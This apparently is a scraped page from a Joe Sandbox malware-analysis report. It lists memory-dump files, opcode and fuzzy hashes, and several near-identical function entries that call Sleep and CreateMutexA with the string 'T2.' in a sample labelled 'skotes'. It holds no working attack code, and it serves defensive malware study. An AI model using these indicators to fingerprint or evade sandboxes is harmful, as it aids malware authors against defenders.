Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: feaea4c2808b1f8b0b873f3555309743ad3b31c09776b35d04cf4ad78edb5edc
Instruction ID: 920e196c4beb5b0299cd985f6badeba1dfd3e8ad18ea24ca64727e4c9dec0ba0
Opcode Fuzzy Hash: feaea4c2808b1f8b0b873f3555309743ad3b31c09776b35d04cf4ad78edb5edc
Instruction Fuzzy Hash: E13177317251049BFB18EB78DC8C7ACB7A6EB85310F24421EE018EB7D1CB3599A08752

Function 0028A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 893fe8639544e6abddfeb966018f3a59b9e39c96793f9d64f6317de564b9841e
Instruction ID: 6d7c04a715041add34a1e56973370192bd6ed623cd2e2a663505f1b794c8b81a
Opcode Fuzzy Hash: 893fe8639544e6abddfeb966018f3a59b9e39c96793f9d64f6317de564b9841e
Instruction Fuzzy Hash: AB3148317351049BFB08EBB8DDCDBADB7A6DB81310F24421EE419973D1CB7A99A08752

Function 0028A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 6442588730673ae7af1f2ab44aca48433e1365d0f76cb51bb6373997adb3f7d2
Instruction ID: ae93995220d821ef5a9d6a92b2a8aaee51be32570eecc5fbe329d7392b1a3652
Opcode Fuzzy Hash: 6442588730673ae7af1f2ab44aca48433e1365d0f76cb51bb6373997adb3f7d2
Instruction Fuzzy Hash: 8A316A317251009FFB18EB78DCCC7ADB766EB86310F24421EE418972D5CB3559A08712

Function 0028A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 091a97d87bcee8d0892c67302a8ca2535003857b0eb52fbb1e1bdbc89aed1acd
Instruction ID: 80b5ff35766ec21b949d124a3fa239449bdcea817ecd4012d9ad0be15418c5a3
Opcode Fuzzy Hash: 091a97d87bcee8d0892c67302a8ca2535003857b0eb52fbb1e1bdbc89aed1acd
Instruction Fuzzy Hash: E4314A31B351009BFF08EBB8D8CDBADB766DF81310F24421AE0159B2D5CFB959A08752

Function 0028A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: ee63857bd230e2f2f7c155f9e9fb6f85a2f90084bad1d68574a684288c23cfc8
Instruction ID: e7c6d638087f4e50e92efd5950edbac86d501217c0e80dd40be52d13e1986e41
Opcode Fuzzy Hash: ee63857bd230e2f2f7c155f9e9fb6f85a2f90084bad1d68574a684288c23cfc8
Instruction Fuzzy Hash: D9316A31B261049BFB08EB78DCCD7ACB766EB81314F64821AE4559B2D5CF3989A08712

Function 0028A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: afdb4b2cfe8f069259120f36bc5291a6920d8a3cfffc707f4fff76a772d19957
Instruction ID: 98132721fefb68c0c89ebb7bd35c1cc0f1a7fe17de89d5d1328871fd3c41308b
Opcode Fuzzy Hash: afdb4b2cfe8f069259120f36bc5291a6920d8a3cfffc707f4fff76a772d19957
Instruction Fuzzy Hash: 5C316A357261049BFF08EB78DC8D7ADF7A6EB81310F24821AE015972D5CB3589A08752

Function 00289ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
